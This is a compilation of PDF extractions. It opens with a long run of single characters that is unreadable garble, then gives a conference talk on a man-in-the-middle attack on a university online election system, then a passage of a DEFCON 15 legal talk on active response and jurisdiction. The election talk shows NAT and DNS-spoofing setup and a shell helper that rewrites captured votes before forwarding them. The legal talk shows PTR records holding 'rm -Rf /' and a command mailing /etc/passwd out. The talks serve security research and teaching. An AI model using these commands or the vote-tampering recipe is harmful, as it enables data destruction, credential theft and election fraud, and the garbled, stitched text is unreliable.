?
5
<
-
?
,
-
1
5
9
.
7
-
2
E
9
.
<
2
,
7
.
6
-
?
.
7
?
5
<
5
8
-
?
.
.
8
C
5
8
.
A
T
0
/
.
-
5
/
.
6
-
?
.
,
:
-
.
9
/
,
9
G
.
-
<
9
0
C
9
,
/
/
5
8
C
1
.
@
5
7
.
>
5
2
2
7
0
8
=
J
C
3
9
.
0
-
?
.
9
<
,
9
,
/
.
-
.
9
6
D
6
3
7
?
,
6
7
,
2
5
4
9
,
-
5
8
C
-
?
.
6
<
.
.
1
0
/
.
-
.
9
,
8
1
0
1
0
/
.
-
.
9
:
0
9
1
5
M
.
9
.
8
-
6
5
U
.
1
-
5
9
.
6
A
B
8
0
-
?
.
9
3
6
.
0
:
Y
Z
[
Q
D
>
?
5
7
?
5
6
8
0
-
6
<
.
7
5
J
.
1
4
E
T
B
_
D
,
8
1
?
,
6
4
.
.
8
G
.
.
<
:
,
5
9
2
E
;
3
5
.
-
4
E
-
?
.
,
3
-
0
/
0
-
5
@
.
/
,
8
3
:
,
7
-
3
9
.
9
6
D
5
6
-
?
.
7
9
,
6
?
1
,
-
,
9
.
7
0
9
1
.
9
K
X
[
h
L
A
H
?
.
X
[
h
5
6
<
,
9
-
0
:
-
?
.
,
5
9
4
,
C
6
.
8
6
0
9
,
8
1
1
.
<
2
0
E
/
.
8
-
6
E
6
-
.
/
A
H
?
.
X
[
h
6
-
0
9
.
6
5
8
:
0
9
/
,
-
5
0
8
9
.
2
,
-
5
8
C
-
0
>
?
,
-
5
6
7
,
2
2
.
1
,
a
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
b
D
,
7
0
8
1
5
-
5
0
8
-
?
,
-
7
,
3
6
.
6
-
?
.
,
5
9
4
,
C
-
0
5
8
k
,
-
.
D
0
9
1
.
<
2
0
E
A
H
?
.
X
[
h
/
,
E
6
-
0
9
.
5
8
:
0
9
/
,
-
5
0
8
,
4
0
3
-
,
8
0
8
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
,
8
1
,
9
.
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
A
B
8
0
8
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
5
6
4
,
6
5
7
,
2
2
E
,
8
.
,
9
/
5
6
6
-
?
,
-
-
?
.
X
[
h
1
.
-
.
9
/
5
8
.
1
-
0
4
.
6
5
C
8
5
J
7
,
8
-
A
B
9
.
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
5
6
,
8
.
@
.
8
-
,
:
-
.
9
-
?
.
,
5
9
4
,
C
1
.
<
2
0
E
.
1
D
,
8
1
5
6
,
4
5
-
0
:
,
/
5
6
8
0
/
.
9
6
5
8
7
.
7
3
9
9
.
8
-
C
.
8
.
9
,
-
5
0
8
,
5
9
4
,
C
7
,
8
8
0
-
1
.
<
2
0
E
/
0
9
.
-
?
,
8
0
8
7
.
A
H
?
.
5
8
:
0
9
/
,
-
5
0
8
6
-
0
9
.
1
7
,
8
5
8
7
2
3
1
.
6
<
.
.
1
0
:
-
?
.
@
.
?
5
7
2
.
D
6
-
,
-
.
0
:
-
?
.
4
9
,
G
.
,
8
1
-
?
9
0
-
-
2
.
D
,
8
1
6
-
,
-
3
6
0
:
-
?
.
1
9
5
@
.
9
V6
6
.
,
-
4
.
2
-
A
H
?
.
9
.
?
,
6
4
.
.
8
6
0
/
.
6
<
.
7
3
2
,
-
5
0
8
,
4
0
3
-
-
?
.
8
.
`
-
C
.
8
.
9
,
-
5
0
8
0
:
Y
Z
[
D
6
0
7
,
2
2
.
1
Y
Z
[
i
A
H
?
.
C
0
@
.
9
8
/
.
8
-
5
6
2
5
G
.
2
E
-
0
/
,
8
1
,
-
.
/
0
9
.
6
3
4
6
-
,
8
-
5
,
2
.
/
5
6
6
5
0
8
6
7
0
8
-
9
0
2
1
.
@
5
7
.
6
,
8
1
<
9
0
7
.
1
3
9
.
6
A
B
X
[
h
5
6
8
0
-
7
3
9
9
.
8
-
2
E
9
.
;
3
5
9
.
1
4
E
2
,
>
D
4
3
-
/
,
E
4
.
5
8
-
?
.
:
3
-
3
9
.
A
O
8
-
?
.
8
,
/
.
0
:
7
0
8
@
.
8
5
.
8
7
.
-
0
-
?
.
@
.
?
5
7
2
.
0
>
8
.
9
D
-
?
.
C
0
@
.
9
8
/
.
8
-
/
,
E
/
,
8
1
,
-
.
,
6
E
6
-
.
/
-
?
,
-
7
0
8
-
5
8
3
,
2
2
E
9
.
<
0
9
-
6
@
.
?
5
7
2
.
0
<
.
9
,
-
5
8
C
6
-
,
-
3
6
5
8
2
5
.
3
0
:
E
.
,
9
2
E
5
8
6
<
.
7
-
5
0
8
6
A
d
.
9
E
2
5
-
-
2
.
5
6
G
8
0
>
8
7
0
8
7
9
.
-
.
2
E
,
4
0
3
-
Y
Z
[
i
D
4
3
-
:
0
9
-
?
0
6
.
>
?
0
1
0
8
0
-
-
9
3
6
-
-
?
,
-
-
?
.
C
0
@
.
9
8
/
.
8
-
>
5
2
2
,
2
>
,
E
6
/
,
8
1
,
-
.
>
?
,
-
5
6
4
.
6
-
:
0
9
5
-
6
7
5
-
5
U
.
8
6
D
5
-
>
0
3
2
1
4
.
>
5
6
.
-
0
4
.
,
>
,
9
.
,
8
1
5
8
@
0
2
@
.
1
4
.
:
0
9
.
3
8
,
7
7
.
<
-
,
4
2
.
2
,
>
6
C
.
-
<
,
6
6
.
1
D
9
,
-
?
.
9
-
?
,
8
,
:
-
.
9
A
H
?
.
5
8
:
0
9
/
,
-
5
0
8
,
8
1
:
3
8
7
-
5
0
8
,
2
5
-
E
,
@
,
5
2
,
4
2
.
0
8
,
/
0
1
.
9
8
,
3
-
0
/
0
4
5
2
.
@
5
,
.
2
.
7
-
9
0
8
5
7
8
.
-
>
0
9
G
6
5
6
7
0
8
6
5
1
.
9
,
4
2
.
A
H
?
0
3
C
?
-
?
.
9
.
,
9
.
6
0
/
.
6
-
,
8
1
,
9
1
6
5
8
<
2
,
7
.
:
0
9
-
?
.
6
.
8
.
-
>
0
9
G
6
D
/
,
8
E
7
9
5
-
5
7
,
2
<
5
.
7
.
6
,
9
.
8
0
-
6
-
,
8
1
,
9
1
5
U
.
1
A
H
?
.
/
,
F
0
9
5
-
E
0
:
@
.
?
5
7
2
.
0
>
8
.
9
6
,
9
.
.
M
.
7
-
5
@
.
2
E
<
9
.
@
.
8
-
.
1
:
9
0
/
,
7
7
.
6
6
5
8
C
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
0
8
-
?
.
5
9
0
>
8
@
.
?
5
7
2
.
6
1
3
.
-
0
-
?
.
.
`
0
9
4
5
-
,
8
-
7
0
6
-
6
0
:
7
0
/
<
,
-
5
4
2
.
.
;
3
5
<
/
.
8
-
,
8
1
-
?
.
3
8
=
>
5
2
2
5
8
C
8
.
6
6
0
:
/
,
8
3
:
,
7
-
3
9
.
9
6
-
0
<
9
0
@
5
1
.
6
<
.
7
5
J
7
,
-
5
0
8
6
0
8
9
.
,
6
0
8
,
4
2
.
-
.
9
/
6
A
H
?
.
5
8
,
7
7
.
6
6
5
4
5
2
5
-
E
0
:
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
<
9
.
@
.
8
-
6
7
,
6
3
,
2
/
.
7
?
,
8
5
7
6
:
9
0
/
.
,
6
5
2
E
>
0
9
G
=
5
8
C
0
8
-
?
.
5
9
@
.
?
5
7
2
.
6
D
,
6
>
.
2
2
,
6
<
9
.
@
.
8
-
5
8
C
7
0
8
7
.
9
8
.
1
7
5
-
5
U
.
8
6
:
9
0
/
1
.
-
.
9
/
5
8
5
8
C
.
`
,
7
-
2
E
>
?
,
-
5
8
:
0
9
/
,
-
5
0
8
-
?
.
5
9
@
.
?
5
7
2
.
5
6
6
-
0
9
5
8
C
,
4
0
3
-
-
?
.
/
A
H
?
.
9
.
5
6
,
2
0
-
-
0
-
.
7
?
8
5
7
,
2
2
E
,
8
1
6
0
7
5
0
<
0
2
5
-
5
7
,
2
2
E
.
`
<
2
0
9
.
-
0
4
.
,
4
2
.
-
0
<
0
<
0
<
.
8
-
?
.
.
2
.
7
-
9
0
8
5
7
5
8
:
0
9
/
,
-
5
0
8
5
8
,
@
.
?
5
7
2
.
,
6
.
,
6
5
2
E
,
6
0
8
.
7
,
8
<
0
<
-
?
.
?
0
0
1
A
i
l
m
n
o
p
q
n
r
q
s
t
u
v
w
x
y
z
{
|
}
~
}
y
|
|
~
}
y
z
}
y
}
~
}
y
}
z
A
T
0
7
5
.
-
E
0
:
B
3
-
0
/
0
-
5
@
.
_
8
C
5
8
.
.
9
6
D
O
8
7
A
?
-
-
<
>
>
>
A6
,
.
A
0
9
C
| pdf |
Increasing the security of
your election by fixing it
Daniel C. Silverstein
Damon McCormick
[email protected]
[email protected]
Part One:
Disaster Strikes
The 2000 US Presidential Election led
many to question the accuracy of paper
ballot systems
Several companies seized
on this opportunity to
promote electronic
voting systems:
• Election Systems & Software
• Diebold Election Systems
• Hart InterCivic
• Sequoia Voting Systems
• “...three independent but redundant
memory paths ensure that no votes will
ever be lost or altered.” [1]
• “...World-class encryption techniques
utilized to store election results.” [2]
• “Proprietary firmware on closed system
prevents hacker access.” [3]
Lofty Promises Made
• Trust Us!
• We know what we’re doing!
• Of course we don't have bugs!
• Don't have security holes either!
• And, even if we did, (which we don’t) nobody
could ever actually exploit them
The Message?
And so, Democracy was made safe from evil hackers
The End
If it looks like snake oil...
And it smells like snake oil...
And it tastes like snake oil...
It’s probably snake oil [4]
Or Not
Q: What’s the first thing you do after rooting a box?
Q: What’s the second thing you do after rooting a box?
Pop Quiz 1
A: Hide your presence
A: Patch the hole you came in through
(so nobody else can use it)
Q: How do you tell that someone rooted your box?
Pop Quiz 2
A: Good question!
Forensics analysis is hard!
You can't trust information from a compromised machine.
Q: How do you tell that someone tampered with the
electronic voting machine you just used to vote?
A: You don’t
Pop Quiz 3
• The major commercial electronic voting
machines do not produce a voter verifiable
paper trail
• Though, thanks in part to the work of David Dill [5],
some of the vendors are testing prototypes that do
• Without a paper trail, there is no way to
detect tampering
No Paper Trail
• The major commercial electronic voting
systems are proprietary platforms, protected
as trade secrets
• Members of the security community at large
cannot scrutinize the machines without signing
prohibitive Non-Disclosure Agreements
• We must trust the vendors to detect machine
tampering or malfunction
• In practice, security through obscurity doesn't help
• Just look at Microsoft's security record
Setec Astronomy
• There is little public data on how electronic
voting systems behave in a real election setting
• Not possible to verify the tally in a secret ballot
• Performing a realistic test would be difficult
• Require thousands of volunteers
• Expensive
• Easy to cheat
• Independent third parties can't verify operation
of systems without signing an NDA
• No way to publish results!
Too Little Data
• Electronic voting systems
may be worse than paper
systems!
• There are numerous
avenues of attack on
computer ballot systems
that simply have no
analogue in a paper ballot
system
The Big Problem
• Electronic voting raises
unique security issues
• Failure to understand
these issues could leave
US State and Federal
elections open to
unprecedented fraud!
The Big Problem
“If paramilitary rebels were to take over a voting kiosk
and force computer scientists to work day and night,
they would still not be able to lodge a single false ballot
or affect the outcome.”
--Tommaso Sciortino, ASUC Elections Chair [6]
Part Two:
The Associated Students of the
University of California (ASUC)
Online Election System (OES)
• OES represents a unique opportunity to analyze
the security of an electronic voting system
• Though not fully open, the source to OES was
available on request and without an NDA
• Over 30,000 students were eligible to vote in the
election
• Approximately 9,000 votes were cast
• We reviewed OES in April 2003; this was its first run.
Online Election System
• Ballot Server
• Authentication Layer
(CalNet, CalNetAWS)
• Polling Stations
OES Architecture
• The Ballot Server hosts a simple web application
students access via a web browser at one of the
polling stations
• The voting application works as follows:
• If necessary, redirect user to CalNet for authentication
• Perform sanity checks (has user already voted?)
• Record user's vote
• The Ballot Server ran Red Hat 8
• OES was implemented with Macromedia
ColdFusionMX on Apache 2.0, using MySQL as a
backend database.
Ballot Server
• CalNet [7] is UC Berkeley’s central Kerberos
authentication system
• Implemented via Microsoft Active Directory
• Polling station clients authenticate via
Kerberos web proxy
• Upon successful authentication, a signed
authentication token is passed to the client's
web browser
Authentication Layer (CalNet)
Polling Stations
• Polling stations consist of
three to ten Apple
iBooks behind an
inexpensive home
router/gateway
performing DHCP and
NAT
• Entire polling station sits
behind one IP address
• Traffic that polling station clients exchange
with CalNet and the Ballot Server is sent via
https
• In principle, this should make it impossible to
read or alter traffic
• The security of the election hinges on the
security of the CalNet system
OES Security Assumptions
• Physical security emphasized
• Election officials seemed to have serious concerns
that someone would try to break into the server
room and steal the server
• Basic network security aspects ignored
• The database listened for requests from external
hosts
• Access was not restricted exclusively to web traffic
originating from one of the known polling stations
Ballot Server Defense
• It is trivial to tamper with a machine with
physical access
• Election officials implemented strong physical
security measures
• Physical security doesn’t protect against social
engineering
• As initially configured, the open database
port was the most obvious point of attack
Ballot Server Attacks
• Adding a firewall raised the bar considerably
• Only traffic from the polling stations on ports
80 and 443 was allowed through
• An attack would require preparing an exploit in
advance, storing it on removable media, and
running it from a polling station client
Ballot Server Attacks
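The filtering described above can be sketched with iptables. This is a hedged reconstruction, not the election staff's actual ruleset; the 10.0.0.0/24 polling-station block is a placeholder address range.

```shell
# Sketch of the Ballot Server firewall described above.  The polling
# station source block (10.0.0.0/24) is a placeholder, not the real range.
iptables -P INPUT DROP                                    # default-deny
iptables -A INPUT -i lo -j ACCEPT                         # loopback
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# only web traffic (80/443) from known polling stations gets through
iptables -A INPUT -s 10.0.0.0/24 -p tcp --dport 80  -j ACCEPT
iptables -A INPUT -s 10.0.0.0/24 -p tcp --dport 443 -j ACCEPT
```

With the default-deny policy in place, direct connections to the previously exposed MySQL port are dropped along with everything else that is not polling-station web traffic.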
• CalNet is not written or managed by the
OES developers
• CalNet authentication tokens are
timestamped, and have a limited lifetime
CalNet Defense
• Compromising any of the CalNet machines would
be a bad idea
• Capturing authentication tokens does not require
compromising CalNet’s servers
• Regardless of the short lifetime, tokens can be replayed
CalNet Attacks
• The election staff originally planned to use
computers rented from students for the
polling stations
• We suggested that election officials create
an unprivileged account on the iBooks that
only had permissions to run a web browser
• Default passwords on the router/gateway
boxes were changed
Polling Station Defense
• Had election officials actually used rented
student computers, one could give them a
trojaned machine
• Even with machines that are reasonably well
locked down, it is virtually impossible to
protect a machine from tampering if the
user has physical access
• Polling stations were monitored, but voters were
supposed to have private voting booths.
Polling Station Attacks
• The key idea here is the need for trusted endpoints
• Proving the trustworthiness of a machine is incredibly
difficult.
• Conventional hardware is not designed to be tamper
resistant
• Tampering with individual clients would be time
consuming.
• 70+ machines spread across 15 polling stations.
• Is it possible to compromise an entire polling station
in one fell swoop?
Polling Station Attacks
Part Three:
Man-in-the-Middle
Attack on OES
• We want to acquire CalNet tokens so that
we can replay them to the Ballot Server to
cast fraudulent votes
• It is not possible to sniff the tokens because
clients access CalNet and Ballot Server over
https
• But we can trick the client into giving us a
valid token by making it believe that our
man-in-the-middle is the Ballot Server
Summary
The Attack
• We will construct a man-in-the-middle box,
which we refer to as fakeballot
• Fakeballot is a drop-in replacement for the
router/gateways that perform NAT at each
polling station
• For this attack, we will need:
1 x86 PC
2 network interfaces
1 GNU/Linux distro (Debian)
1 DNS server (djbdns)
1 DHCP server (ISC DHCP)
1 web server with ssl support (apache + mod_ssl)
1 SSL certificate featuring the FQDN of the Ballot Server
signed with a bogus CA (Verisign Inc.) [8]
Ingredients
• Configuring linux to perform simple NAT is
an iptables one-liner
• The external IP of fakeballot will be the IP of the
polling station we will compromise
• The internal IP of fakeballot will be 192.168.1.1
• fakeballot runs a DHCP daemon that
returns its own IP as the only nameserver
NAT and DHCP
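The one-liner itself looks like this; the interface names are assumptions (eth0 facing the polling place's uplink, eth1 the internal 192.168.1.1 side), and the rules must be run as root.

```shell
# Minimal Linux NAT, as described above.  Interface names are assumed:
# eth0 holds the polling station's single external IP, eth1 is internal.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```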
• DNS behaves normally for all hostnames,
except that of the Ballot Server
• DNS returns the internal IP of fakeballot
whenever a request is made for the Ballot
Server’s hostname
DNS Spoofing
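One way to express that split with djbdns (the hostname and paths below are placeholders): dnscache recurses normally for every name, but a per-domain servers file hands queries for the Ballot Server's name to a local tinydns that knows only fakeballot's internal address.

```shell
# Selective DNS override with djbdns; hostname and paths are placeholders.
# dnscache resolves all other names normally, but delegates this one:
echo 192.168.1.1 > /etc/dnscache/root/servers/ballot.example.edu
# The tinydns instance at 192.168.1.1 serves a single A record in 'data':
#   +ballot.example.edu:192.168.1.1:300
```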
• Apache listens on fakeballot’s internal IP
• We wrote a small perl script to proxy traffic
to and from Ballot Server
• We simply make standard https requests from
Ballot Server, and pass the returned data directly
to the client
• We have the user’s authentication token
• It is sent via http post in most Ballot Server requests
• When the voting forms are submitted, we
dynamically change the user’s votes.
Configuring Apache
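The rewriting step can be illustrated with a small shell helper. The field names (token, vote), values, and cast URL are hypothetical stand-ins, not OES's real parameters.

```shell
# Illustrative only -- field names, values, and URL are hypothetical.
# rewrite_vote swaps the candidate field in a captured POST body while
# leaving the stolen authentication token untouched.
rewrite_vote() {
  body="$1"; new="$2"
  printf '%s' "$body" | sed "s/vote=[^&]*/vote=$new/"
}

captured='token=abc123&vote=candidate_a'
rewrite_vote "$captured" candidate_b   # prints token=abc123&vote=candidate_b
# The proxy then forwards the altered body to the real Ballot Server, e.g.:
#   curl -k -d "$(rewrite_vote "$captured" candidate_b)" https://ballot.example.edu/cast
```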
• fakeballot’s SSL certificate is signed by a
bogus certificate authority
• This leads to ugly warning messages
What about SSL?
• Count on user behavior
• Browser warnings not that scary, typical users just ‘Click Ok’
• Only one user needs to accept the certificate
• Attacker can add certificate
• ASUC poll workers easy to social engineer
• Browser bugs
• At the time, Safari would accept any cert signed by a valid
authority, regardless of the name specified [9]
• Similar bugs appeared in Netscape and IE
Why SSL Doesn’t Matter
Part Four:
Lessons Learned
Critical Vulnerabilities in OES
• OES suffered from multiple critical security
vulnerabilities
• Easy to find and exploit
• Common ‘beginner’ blunders
• More subtle holes yet to be found?
OES vs. Commercial Systems?
• OES differs from the commercial systems in
a number of important ways
• Commercial electronic voting systems don’t
connect to the internet
• At least, we sincerely hope not
• OES source is available for review
• Expected lifetime for OES is much shorter
• Commercial systems could be in use for decades
• In light of OES’ flaws, existence of similar bugs in
commercial systems is plausible
• Commercial systems are closed
• Amplifies damage resulting from a security breach
• Increases time before holes are discovered
• Vendors appear new to computer security
• Mistakes likely
• Higher Stakes
• Commercial systems will be used to elect the President
Cause for Concern?
• Endorse VerifiedVoting.org’s Resolution on
Electronic Voting [10]
• Write to Congress
• Emphasize need for voter verified paper ballot
• Encourage the use of open source voting
systems
• Talk to local officials
• Purchasing decisions for voting hardware are
often made at the county level
What you can do
1. http://www.essvote.com/pdf/iv101502.pdf
2. http://www.diebold.com/solutions/election/accuvote_ts.htm
3. http://www.sequoiavote.com/productGuide.php
4. See Bruce Schneier’s excellent crypto snake oil rant
http://www.counterpane.com/crypto-gram-9902.html#snakeoil
5. http://www.verifiedvoting.org/
6. Daily Californian, 2/11/2003
http://www.dailycal.org/article.asp?id=10858
7. http://calnet.berkeley.edu
8. The real Verisign is Verisign, Inc.
9. Safari Common Name verification bug
http://www.secunia.com/advisories/8756/
10. http://www.verifiedvoting.org/resolution.asp
References | pdf |
DEFCON 15
August 3, 2007
Robert W. Clark
United States v. Prochner, 417 F.3d 54 (D. Mass.
July 22, 2005)
Definition of Special Skills
Special skill - a skill not possessed by members of the
general public and usually requiring substantial
education, training or licensing.
Examples - pilots, lawyers, doctors, accountants,
chemists, and demolition experts
Not necessarily have formal education or training
Acquired through experience or self-tutelage
Critical question is - whether the skill set elevates to a
level of knowledge and proficiency that eclipses that
possessed by the general public.
Court Recognizes Your
Special Skills
Since You Are Special
Clark’s Law – Explain @ 3rd Grade Level
Explaining Technology to Lawyers
FACTS ARE KING!!!
Explaining Computer Search/Technology
E-Discovery Rules
Final Point- Materials Provided Contain
Greater Details than Presentation slides.
Court Recognizes Your
Special Skills
Agenda
Active Response
Liability for Stolen Code??
Jurisdiction
Civil Jurisdiction
Criminal
Web Sites – Liabilities & Jurisdiction
Search & Seizure of Computers
Home
Work Place
Consent & Third Party Consent
Viacom v. Google
E-Discovery & Forensics
Our Discussion – Like law school, just to get you
thinking and debating. Not necessarily an
endorsement by the presenter, aka- me.
Disclaimer
aka The Fine Print
JER 3-307.
Teaching, Speaking and Writing
a.
Disclaimer for Speeches and Writings Devoted to Agency Matters. A DoD employee who uses or
permits the use of his military grade or who includes or permits the inclusion of his title or position as
one of several biographical details given to identify himself in connection with teaching, speaking or
writing, in accordance with 5 C.F.R. 2635.807(b)(1) (reference (h)) in subsection 2-100 of this Regulation,
shall make a disclaimer if the subject of the teaching, speaking or writing deals in significant part with
any ongoing or announced policy, program or operation of the DoD employee's Agency, as defined in
subsection 2-201 of this Regulation, and the DoD employee has not been authorized by appropriate
Agency authority to present that material as the Agency's position.
(1)
The required disclaimer shall expressly state that the views presented are those of the speaker or
author and do not necessarily represent the views of DoD or its Components.
(2)
Where a disclaimer is required for an article, book or other writing, the disclaimer shall be printed
in a reasonably prominent position in the writing itself. Where a disclaimer is required for a speech or
other oral presentation, the disclaimer may be given orally provided it is given at the beginning of the oral
presentation.
Self defense of personal property: one must prove that
he was in a place he had a right to be, that he acted
without fault and that he used reasonable force
which he reasonably believed was necessary to
immediately prevent or terminate the other person's
trespass or interference with property lawfully in his
possession
Moore v. State, 634 N.E.2d 825 (Ind. App. 1994) and
Pointer v. State, 585 N.E. 2d 33, 36 (Ind. App. 1992)
Right to exclude people from one’s personal property
is not unlimited.
Active Response & Self Defense
Common Law Doctrine-Trespass to Chattel
Owner of personal property has a cause of action for
trespass and may recover only the actual damages
suffered by reason of the impairment of the property
or the loss of its use
One may use reasonable force to protect his
possession against even harmless interference
The law favors prevention over post-trespass
recovery, as it is permissible to use reasonable force
to retain possession of a chattel but not to recover it
after possession has been lost
Intel v. Hamidi, 71 P.3d 296 (Cal. Sp. Ct. June 30,
2003
Active Response & Self Help
Hoblyn v. Johnson, 2002 WY 152, 2002 Wyo. LEXIS
173 (Wyo., October 9, 2002, Decided)
One is privileged to enter land in the possession of another,
at a reasonable time and in a reasonable manner, for the
purpose of removing a chattel to the immediate
possession of which the actor is entitled, and which has
come upon the land otherwise than with the actor's consent
or by his tortious conduct or contributory negligence.
This privilege is limited to those situations where the actor,
as against all persons, is entitled to immediate possession
of the chattel both at the time when the chattel is placed on
the land and when the actor seeks to enter and reclaim it.
Active Response & Self Help
Defender or Attacker ?
Reverse DNS Entries
252.11.64.178.in-addr.arpa 86400 IN PTR rm -Rf / ;
253.11.64.178.in-addr.arpa 86400 IN PTR | rm -Rf /
254.11.64.178.in-addr.arpa 86400 IN PTR ; cat /etc/passwd | mail [email protected]
Attacker or Victim
Zone Transfer, one name server located on 178.64.11.8
# dig @178.64.11.8 version.bind chaos txt
Owned - - Xterms manipulated to execute code
MX records
Custom .NET tool in C# reverse lookup
3 entries catch eye with a LOL
rm -Rf /;, 178.64.11.252
| rm -Rf /, 178.64.11.253
; cat /etc/passwd | mail [email protected], 178.64.11.254
Active Response & Self Help
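The sweep and the catch can be sketched in shell rather than the custom C#/.NET tool the slide mentions; the prefix argument mirrors the example network above, and the point is that PTR records are attacker-controlled text that must be sanitized before being echoed into a shell or a report.

```shell
# Shell sketch of the reverse-lookup sweep (the slide's tool was C#/.NET).
# suspicious_ptr flags PTR answers carrying shell metacharacters or
# whitespace -- e.g. "rm -Rf / ;" -- instead of letting them reach a shell.
suspicious_ptr() {
  grep -E '[;|&`$]|[[:space:]]'
}

scan_net() {                      # usage: scan_net 178.64.11
  for i in $(seq 1 254); do
    dig +short -x "$1.$i" | suspicious_ptr && echo "  ^ hostile PTR at $1.$i"
  done
}
```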
Universal Tube & Rollform Equipment Corp., v
YouTube, In., et al., 2007 WL 1655507 (N.D. Ohio.
June 4, 2007)
Lanham Act- Protectable Mark
Lanham Act provides a cause of action for infringement of a mark that has not been
federally registered. Courts must determine whether the mark is protectable, and if
so, whether there is a likelihood of confusion as a result of the would-be infringer's
use of the mark. Court allows claim to go forward
Trespass to Chattel
Trespass to chattel claim, although it involves something as amorphous as “the
internet,” must still maintain some link to a physical object, in that case a computer.
Domain name is an intangible object, much like a street address or a telephone
number, which, though it may ultimately point to an approximate or precise
physical location, is without physical substance, and it is therefore impossible to
make “physical contact” with it. Universal's only hope of succeeding on its
trespass to chattels claim, therefore, rests on its ability to show a link to a physical
object. Universal entered contract w/ third party for website, so no interest in
host’s computers. Moreover, YouTube did not make physical contact with
computers hosting website, mistaken visitors did.
Nuisance
Active Response & Nuisance
Liability for Stolen Malicious Code
Hurdles
Your Code Stolen
Secured System
Your Code Attributed to You
Victim Sues
Analogy – Stolen Guns (Hey it’s the best I can do!!!)
Liability for Stolen Malicious Code
Negligence
(1) defendant had a duty to the plaintiff;
(2) defendant failed to perform that duty; and,
(3) defendant's breach was the proximate
cause of the plaintiff's injury
Item Causing the Harm
Firearms are inherently dangerous, and those
who own and control firearms should be
required to exercise the highest degree of care
Liability for Stolen Malicious Code
Negligence
Minimum causation requirement is the "but for"
test - accident would not have happened but for
the act or omission. Many opinions place
emphasis on foreseeability.
Courts show great reluctance to find liability if
the chain of causation includes a series of
events, subsequent to the initial act or omission,
over which the defendant has absolutely no
control - "intervening cause"
Liability for Stolen Malicious Code
Negligence
The defendant is not invariably excused from liability when the
chain of causation includes a criminal act.
The overwhelming weight of authority holds that the owner of
an automobile who parks the car in a public area with the keys
in the ignition is not liable to a motorist or a pedestrian injured
by the negligent driving of a thief who has an accident after
stealing the car. See Ford v. Monroe, 559 S.W.2d 759 (Mo. App.
1977).
June 2006, Sharon Kask, (girlfriend), boyfriend’s son, history
of violence, under psychiatric observation, home-made gun
cabinet, unscrews hinges, takes gun, shoots cop 3 times.
Mass. high court reverse summary judgment says, foreseeable
that he’d use unsupervised access to house to steal gun and
cause harm.
Liability for Stolen Malicious Code
Negligence – Malicious Code
The defendant is not invariably excused from liability when the
chain of causation includes a criminal act.
Your Computer or Network
Secured – with what and how.
Advertisement that code may be on system
Work in Security Field
IRC or Chat Rooms
Lectures and Presentations at say . . . Black Hat
The Item Causing the Harm
Code - how inherently dangerous?
Virus
Worm
Rootkit
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
1. The defendant is prohibited from accessing any
computer equipment or any “on-line” computer service
at any location, including employment or education. This
includes, but is not limited to, any internet service
provider, bulletin board system, or any other public or
private computer network;
2. The defendant shall not possess any materials,
including pictures, photographs, books, writings,
drawings, videos or video games depicting and/or
describing sexually explicit conduct as defined at Title
18, United States Code, Section 2256(2); and
3. The defendant shall not associate with children under
the age of 18 except in the presence of a responsible
adult who is aware of the defendant’s background and
current offense and who has been approved by the
probation officer
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
Condition must be “reasonably related” to the factors
set forth in 18 U.S.C. § 3553(a). Those factors include:
“(1) the nature and circumstances of the offense and the
history and characteristics of the defendant; [and] (2) the
need for the sentence imposed . . . (B) to afford adequate
deterrence to criminal conduct; (C) to protect the public
from further crimes of the defendant; and (D) to provide
the defendant with needed educational or vocational
training, medical care, or other correctional treatment in
the most effective manner.” 18 U.S.C. § 3553(a). Any
such condition must impose “no greater deprivation of
liberty than is reasonably necessary” to deter future
criminal conduct, protect the public, and rehabilitate the
defendant
Terms of Probation
United States v. Voelker, --- F.3d ----, 2007 WL 1598534
(3d Cir. W.D. Penn. June 5, 2007)
PROHIBITION OF COMPUTER EQUIPMENT AND THE
INTERNET
Voelker contends that an absolute lifetime ban on using computers
and computer equipment as well as accessing the internet, with no
exception for employment or education, involves a greater
deprivation of liberty than is reasonably necessary and is not
reasonably related to the factors set forth in 18 U.S.C. § 3583. We
agree.
The ubiquitous presence of the internet and the all-encompassing
nature of the information it contains are too obvious to require
extensive citation or discussion
Civil Jurisdiction v Criminal Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc.
LEXIS 1307 (NY Sp Ct May 10, 2006)
Hageseth v Superior Court of San
Mateo County, --- Cal.Rptr.3d ----,
2007 WL 1464250, Cal.App. 1 Dist.
(May 21, 2007)
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Plaintiff sued for destruction of personal property, defamation,
intentional infliction of emotional distress, tortious interference
with a business, computer trespass, and computer tampering.
On February 20, 2005, the defendants, his uncle and aunt,
without permission or authority, entered the Website from
their home computer in Florida, deleted all of the files on the
Website, and placed their own picture of the plaintiff on the
Website, with phrases such as "Pig of the Year," and "I'm
going to eat everything in site," next to the plaintiff's picture.
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Defendants contend the Court lacks jurisdiction over them since
defendants do not reside in New York, have not consented to
service of process in New York, are not "doing business" in New
York, and have no offices or employees in New York
Defendants also contend that jurisdiction is lacking given that they
have not transacted business in New York, and have had no
contacts with New York sufficient to establish that they
purposefully availed themselves of the privileges of conducting
business in New York.
The defendants also maintain that a New York court may not exert
personal jurisdiction over them since the defendants have not
committed a tortious act within the state.
Jurisdiction
Jurisdiction
Davidoff v. Davidoff, 2006 N.Y. Misc. LEXIS 1307 (NY
Sp Ct May 10, 2006)
Plaintiff alleges that the Court has personal jurisdiction over the
defendants. Plaintiff points out that Courts have held that in this
age of instant communications via telephone, facsimile and the
internet, physical presence of the defendants in New York is not
required for a finding of a tortious act within the state. Plaintiff
notes that the court should place emphasis on the locus of the tort,
not physical presence, when determining a jurisdictional issue.
Plaintiff submits that New York was the locus of the alleged
